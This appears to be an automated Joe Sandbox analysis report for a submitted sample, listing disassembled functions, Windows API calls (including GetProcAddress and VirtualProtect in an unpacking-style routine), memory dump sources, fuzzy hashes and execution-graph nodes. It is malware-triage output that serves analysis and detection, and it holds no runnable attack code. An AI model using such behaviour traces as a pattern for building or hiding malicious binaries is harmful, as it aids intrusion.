                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                    • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                    • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                    • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                    • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                                                                                    • String ID: MZ@
                                                                                                                                                                                                                                    • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                    • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                    • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 438689982-0
                                                                                                                                                                                                                                    • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                    • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                                                                    • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                                                                    • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                                                                                                                                      • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcmp$memcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 231171946-0
                                                                                                                                                                                                                                    • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                    • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                                                                    • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                                                                    • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                                                                    • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                                                                                                                                    Signature Coverage:0.5%
                                                                                                                                                                                                                                    Total number of Nodes:871
                                                                                                                                                                                                                                    Total number of Limit Nodes:22
                                                                                                                                                                                                                                    execution_graph 34104 40fc40 70 API calls 34277 403640 21 API calls 34105 427fa4 42 API calls 34278 412e43 _endthreadex 34279 425115 76 API calls 34280 43fe40 133 API calls 34108 425115 83 API calls 34109 401445 memcpy memcpy DialogBoxParamA 34110 440c40 34 API calls 34112 411853 RtlInitializeCriticalSection memset 34113 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34286 40a256 13 API calls 34288 432e5b 17 API calls 34290 43fa5a 20 API calls 34115 401060 41 API calls 34293 427260 CloseHandle memset memset 33168 410c68 FindResourceA 33169 410c81 SizeofResource 33168->33169 33172 410cae 33168->33172 33170 410c92 LoadResource 33169->33170 33169->33172 33171 410ca0 LockResource 33170->33171 33170->33172 33171->33172 34295 405e69 14 API calls 34120 433068 15 API calls 34297 414a6d 18 API calls 34298 43fe6f 134 API calls 34122 424c6d 15 API calls 34299 426741 19 API calls 34124 440c70 17 API calls 34125 443c71 44 API calls 34128 427c79 24 API calls 34302 416e7e memset 34132 42800b 47 API calls 34133 425115 85 API calls 34305 41960c 61 API calls 34134 43f40c 122 API calls 34137 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34138 43f81a 20 API calls 34140 414c20 memset memset 34141 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34309 414625 18 API calls 34310 404225 modf 34311 403a26 strlen WriteFile 34313 40422a 12 API calls 34317 427632 memset memset memcpy 34318 40ca30 59 API calls 34319 404235 26 API calls 34142 42ec34 61 API calls 34143 425115 76 API calls 34320 425115 77 API calls 34322 44223a 38 API calls 34149 43183c 112 API calls 34323 44b2c5 _onexit __dllonexit 34328 42a6d2 memcpy 34151 405cda 65 API calls 34336 43fedc 138 API calls 34337 4116e1 16 API calls 34154 4244e6 19 API calls 34156 42e8e8 127 API calls 34157 4118ee RtlLeaveCriticalSection 34342 43f6ec 22 API calls 34159 425115 119 API calls 33158 410cf3 EnumResourceNamesA 34345 4492f0 memcpy memcpy 34347 43fafa 18 API calls 34349 4342f9 15 API calls 34160 4144fd 19 API calls 34351 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34352 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34355 443a84 _mbscpy 34357 43f681 17 API calls 34163 404487 22 API calls 34359 415e8c 16 API calls 34167 411893 RtlDeleteCriticalSection 34168 41a492 42 API calls 34363 403e96 34 API calls 34364 410e98 memset SHGetPathFromIDList SendMessageA 34170 426741 109 API calls 34171 4344a2 18 API calls 34172 4094a2 10 API calls 34367 4116a6 15 API calls 34368 43f6a4 17 API calls 34369 440aa3 20 API calls 34371 427430 45 API calls 34175 4090b0 7 API calls 34176 4148b0 15 API calls 34178 4118b4 RtlEnterCriticalSection 34179 4014b7 CreateWindowExA 34180 40c8b8 19 API calls 34182 4118bf RtlTryEnterCriticalSection 34376 42434a 18 API calls 34378 405f53 12 API calls 34190 43f956 59 API calls 34192 40955a 17 API calls 34193 428561 36 API calls 34194 409164 7 API calls 34382 404366 19 API calls 34386 40176c ExitProcess 34389 410777 42 API calls 34199 40dd7b 51 API calls 34200 425d7c 16 API calls 34391 43f6f0 25 API calls 34392 42db01 22 API calls 34201 412905 15 API calls 34393 403b04 54 API calls 34394 405f04 SetDlgItemTextA GetDlgItemTextA 34395 44b301 ??3@YAXPAX 34398 4120ea 14 API calls 34399 40bb0a 8 API calls 34401 413f11 strcmp 34205 434110 17 API calls 34208 425115 108 API calls 34402 444b11 _onexit 34210 425115 76 API calls 34213 429d19 10 API calls 34405 444b1f __dllonexit 34406 409f20 _strcmpi 34215 42b927 31 API calls 34409 433f26 19 API calls 34410 44b323 FreeLibrary 34411 427f25 46 API calls 34412 43ff2b 17 API calls 34413 43fb30 19 API calls 34222 414d36 16 API calls 34224 40ad38 7 API calls 34415 433b38 16 API calls 34095 44b33b 34096 44b344 ??3@YAXPAX 34095->34096 34097 44b34b 34095->34097 34096->34097 34098 44b354 ??3@YAXPAX 34097->34098 34099 44b35b 34097->34099 34098->34099 34100 44b364 ??3@YAXPAX 34099->34100 34101 44b36b 34099->34101 34100->34101 34102 44b374 ??3@YAXPAX 34101->34102 34103 44b37b 34101->34103 34102->34103 34228 426741 21 API calls 34229 40c5c3 125 API calls 34231 43fdc5 17 API calls 34416 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34234 4161cb memcpy memcpy memcpy memcpy 33173 44b3cf 33174 44b3e6 33173->33174 33179 44b454 33173->33179 33174->33179 33186 44b40e GetModuleHandleA 33174->33186 33176 44b45d GetModuleHandleA 33180 44b467 33176->33180 33177 44b49a 33199 44b49f 33177->33199 33179->33176 33179->33177 33179->33180 33180->33179 33181 44b487 GetProcAddress 33180->33181 33181->33179 33182 44b405 33182->33179 33182->33180 33183 44b428 GetProcAddress 33182->33183 33183->33179 33184 44b435 VirtualProtect 33183->33184 33184->33179 33185 44b444 VirtualProtect 33184->33185 33185->33179 33187 44b417 33186->33187 33189 44b454 33186->33189 33218 44b42b GetProcAddress 33187->33218 33191 44b45d GetModuleHandleA 33189->33191 33192 44b49a 33189->33192 33198 44b467 33189->33198 33190 44b41c 33190->33189 33194 44b428 GetProcAddress 33190->33194 33191->33198 33193 44b49f 777 API calls 33192->33193 33193->33192 33194->33189 33195 44b435 VirtualProtect 33194->33195 33195->33189 33196 44b444 VirtualProtect 33195->33196 33196->33189 33197 44b487 GetProcAddress 33197->33189 33198->33189 33198->33197 33200 444c4a 33199->33200 33201 444c56 GetModuleHandleA 33200->33201 33202 444c68 __set_app_type __p__fmode __p__commode 33201->33202 33204 444cfa 33202->33204 33205 444d02 __setusermatherr 33204->33205 33206 444d0e 33204->33206 33205->33206 33227 444e22 _controlfp 33206->33227 33208 444d13 _initterm __getmainargs _initterm 33209 444d6a GetStartupInfoA 33208->33209 33211 444d9e GetModuleHandleA 33209->33211 33228 40cf44 33211->33228 33215 444dcf _cexit 33217 444e04 33215->33217 33216 444dc8 exit 33216->33215 33217->33177 33219 44b454 33218->33219 33220 44b435 VirtualProtect 33218->33220 33222 44b45d GetModuleHandleA 33219->33222 33223 44b49a 33219->33223 33220->33219 33221 44b444 VirtualProtect 33220->33221 33221->33219 33226 44b467 33222->33226 33224 44b49f 777 API calls 33223->33224 33224->33223 33225 44b487 GetProcAddress 33225->33226 33226->33219 33226->33225 33227->33208 33279 404a99 LoadLibraryA 33228->33279 33230 40cf60 33267 40cf64 33230->33267 33287 410d0e 33230->33287 33232 40cf6f 33291 40ccd7 ??2@YAPAXI 33232->33291 33234 40cf9b 33305 407cbc 33234->33305 33239 40cfc4 33323 409825 memset 33239->33323 33240 40cfd8 33328 4096f4 memset 33240->33328 33245 40d181 ??3@YAXPAX 33247 40d1b3 33245->33247 33248 40d19f DeleteObject 33245->33248 33246 407e30 _strcmpi 33249 40cfee 33246->33249 33352 407948 free free 33247->33352 33248->33247 33251 40cff2 RegDeleteKeyA 33249->33251 33252 40d007 EnumResourceTypesA 33249->33252 33251->33245 33254 40d047 33252->33254 33255 40d02f MessageBoxA 33252->33255 33253 40d1c4 33353 4080d4 free 33253->33353 33256 40d0a0 CoInitialize 33254->33256 33333 40ce70 33254->33333 33255->33245 33350 40cc26 strncat memset RegisterClassA CreateWindowExA 33256->33350 33260 40d1cd 33354 407948 free free 33260->33354 33262 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33351 40c256 PostMessageA 33262->33351 33264 40d061 ??3@YAXPAX 33264->33247 33268 40d084 DeleteObject 33264->33268 33265 40d09e 33265->33256 33267->33215 33267->33216 33268->33247 33271 40d0f9 GetMessageA 33272 40d17b CoUninitialize 33271->33272 33273 40d10d 33271->33273 33272->33245 33274 40d113 TranslateAccelerator 33273->33274 33276 40d145 IsDialogMessage 33273->33276 33277 40d139 IsDialogMessage 33273->33277 33274->33273 33275 40d16d GetMessageA 33274->33275 33275->33272 33275->33274 33276->33275 33278 40d157 TranslateMessage DispatchMessageA 33276->33278 33277->33275 33277->33276 33278->33275 33280 404ac4 GetProcAddress 33279->33280 33281 404aec 33279->33281 33282 404ad4 33280->33282 33283 404add FreeLibrary 33280->33283 33285 404b13 33281->33285 33286 404afc MessageBoxA 33281->33286 33282->33283 33283->33281 33284 404ae8 33283->33284 33284->33281 33285->33230 33286->33230 33288 410d17 LoadLibraryA 33287->33288 33289 410d3c 33287->33289 33288->33289 33290 410d2b GetProcAddress 33288->33290 33289->33232 33290->33289 33292 40cd08 ??2@YAPAXI 33291->33292 33294 40cd26 33292->33294 33295 40cd2d 33292->33295 33362 404025 6 API calls 33294->33362 33297 40cd66 33295->33297 33298 40cd59 DeleteObject 33295->33298 33355 407088 33297->33355 33298->33297 33300 40cd6b 33358 4019b5 33300->33358 33303 4019b5 strncat 33304 40cdbf _mbscpy 33303->33304 33304->33234 33364 407948 free free 33305->33364 33307 407cf7 33310 407a1f malloc memcpy free free 33307->33310 33311 407ddc 33307->33311 33313 407d7a free 33307->33313 33318 407e04 33307->33318 33368 40796e 7 API calls 33307->33368 33369 406f30 33307->33369 33310->33307 33311->33318 33377 407a1f 33311->33377 33313->33307 33365 407a55 33318->33365 33319 407e30 33320 407e57 33319->33320 33321 407e38 33319->33321 33320->33239 33320->33240 33321->33320 33322 407e41 _strcmpi 33321->33322 33322->33320 33322->33321 33383 4097ff 33323->33383 33325 409854 33388 409731 33325->33388 33329 4097ff 3 API calls 33328->33329 33330 409723 33329->33330 33408 40966c 33330->33408 33422 4023b2 33333->33422 33338 40ced3 33511 40cdda 7 API calls 33338->33511 33339 40cece 33343 40cf3f 33339->33343 33463 40c3d0 memset GetModuleFileNameA strrchr 33339->33463 33343->33264 33343->33265 33346 40ceed 33490 40affa 33346->33490 33350->33262 33351->33271 33352->33253 